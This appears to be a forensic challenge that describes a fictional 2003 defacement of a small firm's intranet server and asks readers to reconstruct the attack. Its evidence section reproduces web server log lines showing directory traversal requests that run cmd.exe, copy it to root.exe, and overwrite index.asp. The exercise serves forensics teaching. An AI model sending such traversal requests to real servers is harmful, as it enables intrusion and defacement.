I. Alert

Given: It's 5:00a on January 6, 2003 and Mr. Bill Northlup (company president) arrives at work. Bill performs his normal routine and logs onto his system and network at 5:23a. He then opens his browser to the company Intranet to check the sales pipeline from the weekend, and in place of the usual welcome screen he sees:

rot in hell
we own you
your security sux

II. Background Information

Given: Northlup, Inc. is a small insurance broker in Midwestern United States. Their network diagram is provided here and their Internet router configuration is provided here.

III. Evidence

Given: Log entries on the Intranet server contained the following:

2003-01-05 12:30:10 172.0.0.0 - 172.16.0.80 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
2003-01-05 12:30:12 172.0.0.0 - 172.16.0.80 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 -
2003-01-05 12:30:22 172.0.0.0 - 172.16.0.80 80 \
GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
2003-01-05 12:32:18 172.0.0.0 - 172.16.0.80 80 \
GET /scripts/root.exe /c+echo+<HTML code inserted here>.././index.asp 502 -

 
IV. Forensic Interrogation
(Answer these as best and complete as you can for your forensic solution. The first two with the most correct answers will be chosen as winners at the end of the month)

1. When did the Intranet web defacement take place (i.e. time and date)?
    
2. How did the Intranet web defacement take affect (i.e. what steps were taken)?
    
3. What vulnerability or exploit may have been involved?
    
4. Where did the attack likely originate from?

Solution